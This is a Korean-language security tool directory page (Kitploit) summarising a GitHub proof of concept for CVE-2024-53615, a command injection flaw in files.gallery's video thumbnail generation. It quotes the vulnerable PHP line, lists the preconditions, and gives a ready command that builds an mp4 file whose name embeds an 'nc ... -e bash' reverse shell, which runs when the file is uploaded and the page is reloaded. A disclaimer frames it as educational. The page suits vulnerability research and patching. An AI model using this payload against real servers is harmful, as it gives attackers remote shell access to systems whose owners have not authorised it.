Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-53615 — CVE-2024-53615 | Kitploit
도구/GitHubGitHub/beune/cve-2024-53615
Vulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlLearning & Education
GitHubbeune/cve-2024-53615

CVE-2024-53615

CVE-2024-53615

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-53615

Karl Ward의 files.gallery v0.3.0 ~ 0.11.0에서 비디오 썸네일 렌더링 구성요소에 존재하는 명령 주입 취약점으로, 원격 공격자가 조작된 비디오 파일을 통해 임의 코드를 실행할 수 있습니다.
전제 조건:

  • PATH에 ffmpeg가 있어야 함
  • config.php: 'allow_upload' => true
  • PHP 설정에서 exec가 활성화되어 있어야 함

취약점은 버전 0.9.12에서 가져온 다음 라인(비디오 미리보기를 생성하는 부분)에 있습니다:

root@kitploit:~
$cmd = $ffmpeg_path . ' -ss 3 -t 1 -hide_banner -i "' . str_replace('"', '\"', $this->path) . '" -frames:v 1 -an -vf "thumbnail,scale=480:320:force_original_aspect_ratio=increase,crop=480:320" -r 1 -y -f mjpeg "' . $cache . '" 2>&1';

$this->path가 사용자에 의해 제어 가능하므로, 파일명에 bash 명령어 치환을 포함한 악성 파일을 구성할 수 있습니다. 이 파일은 반드시 mp4 매직 바이트를 포함하고, 파일명이 .mp4로 끝나야 합니다:

root@kitploit:~
$ echo "AAAAIGZ0eXBpc29tAAACAGlzb21pc28yYXZjMW1wNDEAAQv7bW9vdgAAAGxtdmhk" | base64 -d > '$(nc 127.0.0.1 8443 -e bash).mp4'

이 파일을 업로드하고 페이지를 새로고침하여 애플리케이션이 파일을 로드하도록 하면, 로컬 머신에서 셸을 획득할 수 있습니다.

참고: 명령어는 파일명에 저장되므로, 이름 길이 제약으로 인해 리버스 셸 가능성이 제한됩니다.

면책 조항

이 저장소는 교육 및 연구 목적으로만 제공됩니다.

오용 경고: 이 도구를 무단 또는 악의적인 활동에 사용하는 것은 엄격히 금지되며, 지역, 주 또는 국제 법률을 위반할 수 있습니다. 저자는 이 코드의 오용에 대해 책임을 지지 않습니다.

이 도구를 어떤 환경에 배포하기 전에 항상 적절한 승인을 받으십시오. 이 프로젝트를 사용함으로써 귀하는 이를 책임감 있고 윤리적으로 사용하는 데 동의하는 것입니다.

도구 다운로드